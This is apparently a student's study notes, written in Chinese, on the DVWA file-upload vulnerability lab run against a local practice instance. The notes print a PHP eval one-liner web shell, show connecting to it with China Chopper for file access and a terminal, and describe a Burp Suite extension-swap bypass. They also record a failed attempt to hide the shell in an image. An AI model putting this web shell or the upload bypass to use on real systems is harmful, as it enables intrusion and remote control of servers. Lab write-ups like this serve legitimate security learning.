第十周學習筆記
本周學習內容:
結合DVWA學習Web應用指南
實驗內容:
進行DVWA文件上傳漏洞
實驗步驟:
Low
1.打開DVWA,進入DVWA Security模塊將 Level修改為Low,點擊Submit提交;
2.進入File Upload模塊
3.查看頁面代碼,發現服務器並沒有進行任何限制條件
4.將一句話木馬<?php@eval($_POST[‘apple‘]);?>保存為1.php
5.在DVWA上傳頁面上傳一句話木馬
6.配置中國菜刀,進行連接。右鍵添加地址,在地址欄輸入目標ip加上一句話木馬上傳的路徑,這裏使用的是本機http://localhost:8088/dvwa/hackable/uploads/1.php,密碼參數為“apple”,腳本類型默認php,編碼格式默認,點擊添加
7.選中目標右鍵,可以進行文件管理,或直接進入虛擬終端
Medium
1.打開DVWA,進入DVWA Security模塊將 Level修改為Medium,點擊Submit提交;
2.進入File Upload模塊
3.查看服務器代碼發現對上傳文件的大小進行了要求,文件類型必須是jpeg或者png,大小不能超過100000B
4.此時可以將一句話木馬的後綴名修改為1.jpg,然後利用burp suite抓包進行修改繞過校驗
5.打開burpsuite將Proxy中Option端口號修改為8082
5.打開谷歌瀏覽器,使用代理8082端口號,選中1.jpg文件點擊上傳,查看burpsuite
6.可以看到一句話木馬的後綴名為.jpg將後綴名修改為.php,點擊Forward上傳
7.一句話木馬成功繞過校驗上傳至系統
8.使用菜刀進行連接,可以獲得GetShell權限
High
1.打開DVWA,進入DVWA Security模塊將 Level修改為High,點擊Submit提交;
2.點擊進入File Upload頁面,查看服務器代碼。服務器的限制規則是.後面必須為”*.jpg”、”*.jpeg” 、”*.png類型文件,文件大小小於10000b,同時,getimagesize函數更是限制了上傳文件的文件頭必須為圖像類型。
3.使用教程上面的步驟可以查文件但是並不能上傳,或者下載文件。我搜可以一下其他方法,並下載了一個16進制編輯器,將一計劃木馬添加至圖片16進制代碼的最後上傳至系統,使用菜刀連接發現也是無法獲得最高權限。
*使用16進制編輯器會讓電腦莫名重啟,建議還是別用了,剛剛寫到結尾重啟了,從新寫一遍
第十周學習筆記